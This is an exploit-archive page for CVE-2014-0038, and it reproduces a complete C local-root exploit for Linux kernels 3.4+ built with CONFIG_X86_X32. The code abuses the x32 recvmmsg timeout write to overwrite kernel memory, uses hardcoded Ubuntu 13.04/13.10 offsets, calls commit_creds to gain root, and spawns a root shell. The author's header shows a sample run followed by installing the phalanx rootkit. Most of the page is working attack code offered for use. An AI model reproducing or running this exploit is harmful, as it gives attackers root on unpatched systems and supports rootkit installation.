Linux kernel 3.4+ local root (CONFIG_X86_X32=y)

🗓️ 02 Feb 2014 00:00:00Reported by rebelType

zdt🔗 0day.today👁 78 Views

Linux kernel 3.4+ local root using x32 ABI with recvmmsg can grant root access, bypassing net_sysctl_root's null byte protections, and running on Ubuntu 13.10, 13.04

Reporter	Title	Published	Views	Family All 141
0day.today	Linux kernel 3.4+ Arbitrary write with CONFIG_X86_X32	2 Feb 201400:00	–	zdt
0day.today	Linux Kernel 3.13.1 - 'Recvmmsg' Privilege Escalation (Metasploit)	12 Oct 201600:00	–	zdt
GithubExploit	Exploit for Improper Input Validation in Linux Linux_Kernel	2 Feb 201412:34	–	githubexploit
BDU FSTEC	The vulnerability of the Linux operating system, which allows a malicious individual to increase their privileges	5 Jul 201600:00	–	bdu_fstec
Circl	CVE-2014-0038	2 Feb 201400:00	–	circl
CVE	CVE-2014-0038	6 Feb 201422:00	–	cve
Cvelist	CVE-2014-0038	6 Feb 201422:00	–	cvelist
Debian CVE	CVE-2014-0038	6 Feb 201422:00	–	debiancve
Exploit DB	Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.10) - 'CONFIG_X86_X32' Arbitrary Write (2)	2 Feb 201400:00	–	exploitdb
Exploit DB	Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.04/13.10 x64) - 'CONFIG_X86_X32=y' Local Privilege Escalation (3)	2 Feb 201400:00	–	exploitdb

/*
*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*
recvmmsg.c - linux 3.4+ local root (CONFIG_X86_X32=y)
CVE-2014-0038 / x32 ABI with recvmmsg
by rebel @ irc.smashthestack.org
-----------------------------------
 
takes about 13 minutes to run because timeout->tv_sec is decremented
once per second and 0xff*3 is 765.
 
some things you could do while waiting:
  * watch http://www.youtube.com/watch?v=OPyZGCKu2wg 3 times
  * read https://wiki.ubuntu.com/Security/Features and smirk a few times
  * brew some coffee
  * stare at the countdown giggly with anticipation
 
could probably whack the high bits of some pointer with nanoseconds,
but that would require a bunch of nulls before the pointer and then
reading an oops from dmesg which isn't that elegant.
 
&net_sysctl_root.permissions is nice because it has 16 trailing nullbytes
 
hardcoded offsets because I only saw this on ubuntu & kallsyms is protected
anyway..
 
same principle will work on 32bit but I didn't really find any major
distros shipping with CONFIG_X86_X32=y
 
[email protected]:~$ uname -a
Linux ubuntu 3.11.0-15-generic #23-Ubuntu SMP Mon Dec 9 18:17:04 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux
[email protected]:~$ gcc recvmmsg.c -o recvmmsg
[email protected]:~$ ./recvmmsg
byte 3 / 3.. ~0 secs left.    
w00p w00p!
# id
uid=0(root) gid=0(root) groups=0(root)
# sh phalanx-2.6b-x86_64.sh
unpacking..
 
:)=
 
greets to my homeboys kaliman, beist, capsl & all of #social
 
Sat Feb  1 22:15:19 CET 2014
% rebel %
*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*
*/
 
#define _GNU_SOURCE
#include <netinet/ip.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>
#include <sys/syscall.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sys/utsname.h>
 
#define __X32_SYSCALL_BIT 0x40000000
#undef __NR_recvmmsg
#define __NR_recvmmsg (__X32_SYSCALL_BIT + 537)
#define VLEN 1
#define BUFSIZE 200
 
int port;
 
struct offset {
    char *kernel_version;
    unsigned long dest; // net_sysctl_root + 96
    unsigned long original_value; // net_ctl_permissions
    unsigned long prepare_kernel_cred;
    unsigned long commit_creds;
};
 
struct offset offsets[] = {
    {"3.11.0-15-generic",0xffffffff81cdf400+96,0xffffffff816d4ff0,0xffffffff8108afb0,0xffffffff8108ace0}, // Ubuntu 13.10
    {"3.11.0-12-generic",0xffffffff81cdf3a0,0xffffffff816d32a0,0xffffffff8108b010,0xffffffff8108ad40}, // Ubuntu 13.10
    {"3.8.0-19-generic",0xffffffff81cc7940,0xffffffff816a7f40,0xffffffff810847c0, 0xffffffff81084500}, // Ubuntu 13.04
    {NULL,0,0,0,0}
};
 
void udp(int b) {
    int sockfd;
    struct sockaddr_in servaddr,cliaddr;
    int s = 0xff+1;
 
    if(fork() == 0) {
        while(s > 0) {
            fprintf(stderr,"\rbyte %d / 3.. ~%d secs left    \b\b\b\b",b+1,3*0xff - b*0xff - (0xff+1-s));
            sleep(1);
            s--;
            fprintf(stderr,".");
        }
 
        sockfd = socket(AF_INET,SOCK_DGRAM,0);
        bzero(&servaddr,sizeof(servaddr));
        servaddr.sin_family = AF_INET;
        servaddr.sin_addr.s_addr=htonl(INADDR_LOOPBACK);
        servaddr.sin_port=htons(port);
        sendto(sockfd,"1",1,0,(struct sockaddr *)&servaddr,sizeof(servaddr));
        exit(0);
    }
 
}
 
void trigger() {
    open("/proc/sys/net/core/somaxconn",O_RDONLY);
 
    if(getuid() != 0) {
        fprintf(stderr,"not root, ya blew it!\n");
        exit(-1);
    }
 
    fprintf(stderr,"w00p w00p!\n");
    system("/bin/sh -i");
}
 
typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
_commit_creds commit_creds;
_prepare_kernel_cred prepare_kernel_cred;
 
// thx bliss
static int __attribute__((regparm(3)))
getroot(void *head, void * table)
{
    commit_creds(prepare_kernel_cred(0));
    return -1;
}
 
void __attribute__((regparm(3)))
trampoline()
{
    asm("mov $getroot, %rax; call *%rax;");
}
 
int main(void)
{
    int sockfd, retval, i;
    struct sockaddr_in sa;
    struct mmsghdr msgs[VLEN];
    struct iovec iovecs[VLEN];
    char buf[BUFSIZE];
    long mmapped;
    struct utsname u;
    struct offset *off = NULL;
 
    uname(&u);
 
    for(i=0;offsets[i].kernel_version != NULL;i++) {
        if(!strcmp(offsets[i].kernel_version,u.release)) {
            off = &offsets[i];
            break;
        }
    }
 
    if(!off) {
        fprintf(stderr,"no offsets for this kernel version..\n");
        exit(-1);
    }
 
    mmapped = (off->original_value  & ~(sysconf(_SC_PAGE_SIZE) - 1));
    mmapped &= 0x000000ffffffffff;
 
        srand(time(NULL));
    port = (rand() % 30000)+1500;
 
    commit_creds = (_commit_creds)off->commit_creds;
    prepare_kernel_cred = (_prepare_kernel_cred)off->prepare_kernel_cred;
 
    mmapped = (long)mmap((void *)mmapped, sysconf(_SC_PAGE_SIZE)*3, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0);
 
    if(mmapped == -1) {
        perror("mmap()");
        exit(-1);
    }
 
    memset((char *)mmapped,0x90,sysconf(_SC_PAGE_SIZE)*3);
 
    memcpy((char *)mmapped + sysconf(_SC_PAGE_SIZE), (char *)&trampoline, 300);
 
    if(mprotect((void *)mmapped, sysconf(_SC_PAGE_SIZE)*3, PROT_READ|PROT_EXEC) != 0) {
        perror("mprotect()");
        exit(-1);
    }
     
    sockfd = socket(AF_INET, SOCK_DGRAM, 0);
    if (sockfd == -1) {
        perror("socket()");
        exit(-1);
    }
 
    sa.sin_family = AF_INET;
    sa.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
    sa.sin_port = htons(port);
 
    if (bind(sockfd, (struct sockaddr *) &sa, sizeof(sa)) == -1) {
        perror("bind()");
        exit(-1);
    }
 
    memset(msgs, 0, sizeof(msgs));
 
    iovecs[0].iov_base = &buf;
    iovecs[0].iov_len = BUFSIZE;
    msgs[0].msg_hdr.msg_iov = &iovecs[0];
    msgs[0].msg_hdr.msg_iovlen = 1;
 
    for(i=0;i < 3 ;i++) {
        udp(i);
        retval = syscall(__NR_recvmmsg, sockfd, msgs, VLEN, 0, (void *)off->dest+7-i);
        if(!retval) {
            fprintf(stderr,"\nrecvmmsg() failed\n");
        }
    }
 
    close(sockfd);
 
    fprintf(stderr,"\n");
 
    trigger();
}

#  0day.today [2018-02-09]  #

02 Feb 2014 00:00Current

0.1Low risk

Vulners AI Score0.1

EPSS0.51521

linux kernel 3.4+x32 abi recvmmsg root access net_sysctl_root null byte protection ubuntu 13.10 ubuntu 13.04